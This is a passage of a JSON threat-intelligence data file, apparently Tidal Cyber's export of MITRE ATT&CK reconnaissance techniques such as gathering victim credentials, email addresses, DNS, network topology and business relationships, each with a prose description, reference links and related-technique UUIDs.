"dest-uuid": "a5ab5108-1582-4357-b948-1c6148c7b5ce",
"type": "similar"
},
{
"dest-uuid": "77476b73-f4d1-4689-8f9e-af08d27f4cba",
"type": "similar"
}
],
"uuid": "4acf57da-73c1-4555-a86a-38ea4a8b962d",
"value": "Gather Victim Host Information"
},
{
"description": "Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nAdversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://app.tidalcyber.com/technique/62bc11f9-f88c-437a-98ae-e90def576e7e), breach dumps, code repositories, etc.).<sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup> Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)). ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1589.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "e5d9c785-61bd-483f-b2ac-5bd9a8641b22",
"value": "Credentials"
},
{
"description": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.\n\nAdversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[HackersArise Email](https://app.tidalcyber.com/references/b6aefd99-fd97-4ca0-b717-f9dc147c9413)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup> Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup> For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.<sup>[[GitHub Office 365 User Enumeration](https://app.tidalcyber.com/references/314fb591-d5f2-4f0c-ab0b-97977308b5dc)]</sup><sup>[[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)]</sup>\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Email Accounts](https://app.tidalcyber.com/technique/49ae7bf1-a313-41d6-ad4c-74efc4c80ab6)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1589.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "2eee984c-ea00-4284-b3eb-fd0c603a5a80",
"value": "Email Addresses"
},
{
"description": "Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.\n\nAdversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1589.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "72668851-bf65-42eb-a775-bc607f4520a2",
"value": "Employee Names"
},
{
"description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup> Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup><sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup>\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "e5d9c785-61bd-483f-b2ac-5bd9a8641b22",
"type": "similar"
},
{
"dest-uuid": "2eee984c-ea00-4284-b3eb-fd0c603a5a80",
"type": "similar"
},
{
"dest-uuid": "72668851-bf65-42eb-a775-bc607f4520a2",
"type": "similar"
}
],
"uuid": "aea36489-047e-4c4a-ab26-c51fd3556182",
"value": "Gather Victim Identity Information"
},
{
"description": "Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a targets subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.<sup>[[Sean Metcalf Twitter DNS Records](https://app.tidalcyber.com/references/c7482430-58f9-4365-a7c6-d17067b257e4)]</sup>\n\nAdversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://app.tidalcyber.com/technique/758ad44d-5e29-4c7f-8dae-ddfeb5092ccb). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1590.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "cb4ec901-fe61-4b44-8ad7-7d3d9a9bc809",
"value": "DNS"
},
{
"description": "Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://app.tidalcyber.com/technique/ef55dc56-f2eb-4a3b-a271-3f73b4700c89)).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.<sup>[[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)]</sup><sup>[[Office 265 Azure Domain Availability](https://app.tidalcyber.com/references/dddf33ea-d074-4bc4-98d2-39b7e843e37d)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1590.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "ec145032-4b1b-4dbe-85bf-47360e35b0a3",
"value": "Domain Properties"
},
{
"description": "Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1590.005"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "5c3c8da1-ed0c-4b79-9794-c2fc55588ad9",
"value": "IP Addresses"
},
{
"description": "Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06).<sup>[[Nmap Firewalls NIDS](https://app.tidalcyber.com/references/c696ac8c-2c7a-4708-a369-0832a493e0a6)]</sup> Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1590.006"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "c60e4f32-d8f0-49e8-b0f7-57a6ae35b8bb",
"value": "Network Security Appliances"
},
{
"description": "Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1590.004"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "afe743a7-56b0-4ad1-bd36-dd50d64802fc",
"value": "Network Topology"
},
{
"description": "Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[Pentesting AD Forests](https://app.tidalcyber.com/references/3ca2e78e-751e-460b-9f3c-f851d054bce4)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1590.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "454be621-ea64-409c-981f-809f1238e21c",
"value": "Network Trust Dependencies"
},
{
"description": "Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "cb4ec901-fe61-4b44-8ad7-7d3d9a9bc809",
"type": "similar"
},
{
"dest-uuid": "ec145032-4b1b-4dbe-85bf-47360e35b0a3",
"type": "similar"
},
{
"dest-uuid": "5c3c8da1-ed0c-4b79-9794-c2fc55588ad9",
"type": "similar"
},
{
"dest-uuid": "c60e4f32-d8f0-49e8-b0f7-57a6ae35b8bb",
"type": "similar"
},
{
"dest-uuid": "afe743a7-56b0-4ad1-bd36-dd50d64802fc",
"type": "similar"
},
{
"dest-uuid": "454be621-ea64-409c-981f-809f1238e21c",
"type": "similar"
}
],
"uuid": "58776ca9-0c54-487f-afcc-e7e5b661bd54",
"value": "Gather Victim Network Information"
},
{
"description": "Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organizations business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victims hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f), [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381), or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1591.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "9bd53629-fa2c-417d-b937-c575504be5b1",
"value": "Business Relationships"
},
{
"description": "Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup><sup>[[SEC EDGAR Search](https://app.tidalcyber.com/references/97958143-80c5-41f6-9fa6-4748e90e9f12)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1591.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "d93b51df-014a-4d46-949a-4b8f796e6cca",
"value": "Determine Physical Locations"
},
{
"description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organizations business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victims hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[ThreatPost Broadvoice Leak](https://app.tidalcyber.com/references/91d20979-d4e7-4372-8a83-1e1512c8d3a9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Supply Chain 